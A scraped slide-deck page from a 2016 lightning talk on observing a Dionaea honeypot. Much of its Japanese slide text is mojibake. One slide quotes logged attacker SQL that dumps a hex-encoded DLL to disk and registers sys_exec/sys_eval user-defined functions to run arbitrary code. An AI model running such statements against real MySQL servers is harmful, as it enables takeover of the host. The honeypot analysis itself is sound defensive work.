Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Dionaea観察日記

gen
April 21, 2016

 Dionaea観察日記

サークル活動のLT会で発表した時の資料です。
ハニーポットを運用していて見つけたMySQLへの攻撃のログを解説しています。

gen

April 21, 2016
Tweet

Other Decks in Technology

Transcript

  1. αʔόͷߏ੒ w ๭714ͷ$16̍ίΞ 44%(# 3"..#ͱ͍ͬͨײ͡ͷϓϥϯ w 6CVOUV-54 w ϋχʔϙοτ͸ɺDPXSJFͱ%JPOBFBΛಋೖ w

    DPXSJF͸TTIͷϋχʔϙοτ w ൪ϙʔτͰTTI͕ಈ͍͍ͯΔΑ͏ʹݟ͔͚͍ͤͯΔ w ࣮ࡍͷTTI͸൪ϙʔτɻެ։伴ೝূʹͯ͠Δɻ w DPXSJFͷϩάΛͱΔͷʹ.BSJB%#Λ࢖༻͍ͯ͠Δ͕ɺ%JPOBFBͷ .Z42-ͱϙʔτ͕͔ͿΔͷͰͣΒ͍ͯ͠Δɻ
  2. > DROP FUNCTION IF EXISTS sys_exec; > CREATE FUNCTION sys_exec

    RETURNS string SONAME 'ZD8AkN.dll'; > CREATE FUNCTION sys_eval RETURNS string SONAME 'ZD8AkN.dll'; > DROP FUNCTION IF EXISTS sys_exec; > DROP FUNCTION IF EXISTS sys_eval; > SELECT 0xdeadbeeffeed……………… into DUMPFILE 'ZD8AkN.dll'; ʙzTZT@FYFD z΍zTZT@FWBM zΛ༻͍ͨΫΤϦʙ Ϣʔβఆٛؔ਺ͱͯ͠TZT@FYFD  TZT@FWBM Λ࡞੒͠ɺ೚ҙίʔυ࣮ߦ